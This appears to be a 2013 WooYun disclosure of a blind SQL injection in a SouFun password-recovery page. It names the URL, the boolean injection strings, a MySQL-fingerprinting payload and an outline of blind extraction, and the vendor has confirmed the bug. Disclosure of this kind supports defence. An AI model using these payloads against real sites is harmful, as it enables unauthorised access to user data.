当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-034901

漏洞标题:搜房某后台post型sql盲注漏洞一枚

相关厂商:搜房网

漏洞作者: shack2

提交时间:2013-08-21 16:19

修复时间:2013-10-05 16:20

公开时间:2013-10-05 16:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-21: 细节已通知厂商并且等待厂商处理中
2013-08-21: 厂商已经确认,细节仅向厂商公开
2013-08-31: 细节向核心白帽子及相关领域专家公开
2013-09-10: 细节向普通白帽子公开
2013-09-20: 细节向实习白帽子公开
2013-10-05: 细节向公众公开

简要描述:

某后台OR型盲注

详细说明:

找回密码处,用户名username参数未过滤导致盲注
http://home.www2.soufun.com/pwdapply.php
发送邮件找回密码逻辑:
select pwd from user where email='邮箱';
发送密码到邮箱
通过or来判断是否存在sql注入
select pwd from user where email='5' or 'a'='a';肯定能查询到数据
1.输入一个用户找回密码,看提示

1.jpg


2.提示此用户不存在

2.jpg


3.输入:a' or 'a'='a

3.jpg


4.提示:此用户不能自助重置

4.jpg


5.输入:a' or 'a'='b

5.jpg


6.提示:提示此用户不存在

6.jpg


输入:a' or 'a'='b正常输入:5提示一样,和输入:a' or 'a'='a不同
证明此处存在SQL注入
判断是否mysql数据库:

username=5' or(1=1 and select * from information_schema.tables) and 'a'='a
提示:此用户不能自助重置,证明是mysql数据库
通过ascii转换截取单个查询的数据库内容,判断大小,可以进行盲注


数据库就不跑了,证明存在漏洞即可

漏洞证明:

找回密码处,用户名username参数未过滤导致盲注
http://home.www2.soufun.com/pwdapply.php
发送邮件找回密码逻辑:
select pwd from user where email='邮箱';
发送密码到邮箱
通过or来判断是否存在sql注入
select pwd from user where email='5' or 'a'='a';肯定能查询到数据
1.输入一个用户找回密码,看提示

1.jpg


2.提示此用户不存在

2.jpg


3.输入:a' or 'a'='a

3.jpg


4.提示:此用户不能自助重置

4.jpg


5.输入:a' or 'a'='b

5.jpg


6.提示:提示此用户不存在

6.jpg


输入:a' or 'a'='b正常输入:5提示一样,和输入:a' or 'a'='a不同
证明此处存在SQL注入
判断是否mysql数据库:

username=5' or exists(select * from information_schema.tables) and 'a'='a
提示:此用户不能自助重置,证明是mysql数据库
通过ascii转换截取单个查询的数据库内容,判断大小,可以进行盲注


数据库就不跑了,证明存在漏洞即可

修复方案:

过滤sql注入关键字符:',or,and,select,union等

版权声明:转载请注明来源 shack2@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-08-21 17:46

厂商回复:

已经通知程序员修改,谢谢

最新状态:

暂无